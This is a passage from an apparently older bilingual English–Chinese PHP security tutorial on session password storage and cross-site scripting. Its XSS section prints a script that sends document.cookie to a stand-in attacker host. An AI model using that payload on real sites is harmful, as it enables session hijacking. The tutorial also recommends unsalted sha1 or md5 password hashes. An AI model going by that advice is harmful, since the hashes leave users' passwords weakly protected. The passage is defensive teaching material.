PHP的七大安全错误（一）(2)

如果你的站点运行在一个共享主机上，需要注意会话变量可以很容易的被同一服务器上的其他用户浏览。为了减少此类风险，可以把敏感的数据以会话ID为主键保存在数据库中，这样比直接保存在会话变量中要好的多。如果必须要在会话变量中保存密码（我还是要强调尽量避免这样做），不要直接保存密码的明文，用sha1或者md5函数加密后保存在会话变量中。

if ($_SESSION['password'] == $userpass) {
// do sensitive things here
}

The above code is not secure, since the password is stored in plain text in a session variable. Instead, use code more like this:

上面的代码把密码以平文保存在会话变量中，这样是不安全的。应该这样作：

if ($_SESSION['sha1password'] == sha1($userpass)) {
// do sensitive things here
}

The SHA-1 algorithm is not without its flaws, and further advances in computing power are making it possible to generate what are known as collisions (different strings with the same SHA-1 sum). Yet the above technique is still vastly superior to storing passwords in clear text. Use MD5 if you must -- since it's superior to a clear text-saved password -- but keep in mind that recent developments have made it possible to generate MD5 collisions in less than an hour on standard PC hardware. Ideally, one should use a function that implements SHA-256; such a function does not currently ship with PHP and must be found separately.

SHA-1算法并不是一点风险也没有，随着计算机计算能力的不断加强，使得用“碰撞”的暴力方法可以破解。但是这样的技术仍然要比直接保存密码的明文好的多。如果必须，可以用MD5算法，它比明文保存密码安全，但最近的研究表明MD5的“碰撞”可以在一台普通PC上不到一个小时就可以算出。理论上，应当使用SHA-256这样的安全算法，但是这个算法目前并不被PHP默认支持，需要另外的扩展支持。

For further reading on hash collisions, among other security related topics, Bruce Schneier's Website is a great resource.

如果要获取更多关于散列碰撞的安全相关文章，Bruce Schneier's Website 是一个不错的站点。

Cross Site Scripting (XSS) Flaws

跨站脚本攻击

Cross site scripting, or XSS, flaws are a subset of user validation where a malicious user embeds scripting commands -- usually JavaScript -- in data that is displayed and therefore executed by another user.

跨站脚本攻击或者XSS，是恶意用户利用验证上的漏洞将脚本命令嵌入到可以显示的数据中，使其在另一个用户浏览时可以执行这些脚本命令。

For example, if your application included a forum in which people could post messages to be read by other users, a malicious user could embed a <script> tag, shown below, which would reload the page to a site controlled by them, pass your cookie and session information as GET variables to their page, then reload your page as though nothing had happened. The malicious user could thereby collect other users' cookie and session information, and use this data in a session hijacking or other attack on your site.

例如，如果你的站点包含一个用户可以交流信息的论坛，一个恶意用户就会在发布的信息中嵌入<script>标签，如下文所示。这样网页首先会被重定向到一个被他们所控制的站点，将用户的cookie和会话信息通过GET变量传递到他们的网页，然后再指向论坛的网页，整个过程就像什么也没发生一样。这样恶意用户就会收集其他用户的cookie和会话信息，用来进行会话截获攻击或者其他破坏行为。

<script>
document.location =
'http://www.badguys.com/cgi-bin/cookie.php?' +
document.cookie;
</script>

To prevent this type of attack, you need to be careful about displaying user-submitted content verbatim on a Web page. The easiest way to protect against this is simply to escape the characters that make up HTML syntax (in particular, < and >) to HTML character entities (&lt; and &gt;), so that the submitted data is treated as plain text for display purposes. Just pass the data through PHP's htmlspecialchars function as you are producing the output.

要阻止这样的攻击，首先要特别注意怎样显示用户提交的数据。最简单的方法就是将HTML语法的字符（特别注意<和>）转化为HTML实体，这样就可以将用户提交的数据转化为作为显示的文本。因此，只要在显示的时候将数据用htmlspecialchars函数过滤一下即可。

If your application requires that your users be able to submit HTML content and have it treated as such, you will instead need to filter out potentially harmful tags like <script>. This is best done when the content is first submitted, and will require a bit of regular expressions know-how.

如果你的应用程序需要用户提交HTML的内容，并且将他们作为HTML来对待，你必须把像<script>这样危险的标记过滤掉。最好是在提交得时候就进行过滤，这需要一点正则表达式的知识。

The Cross Site Scripting FAQ at cgisecurity.com provides much more information and background on this type of flaw, and explains it well. I highly recommend reading and understanding it. XSS flaws can be difficult to spot and are one of the easier mistakes to make when programming a PHP application, as illustrated by the high number of XSS advisories issued on the popular security mailing lists.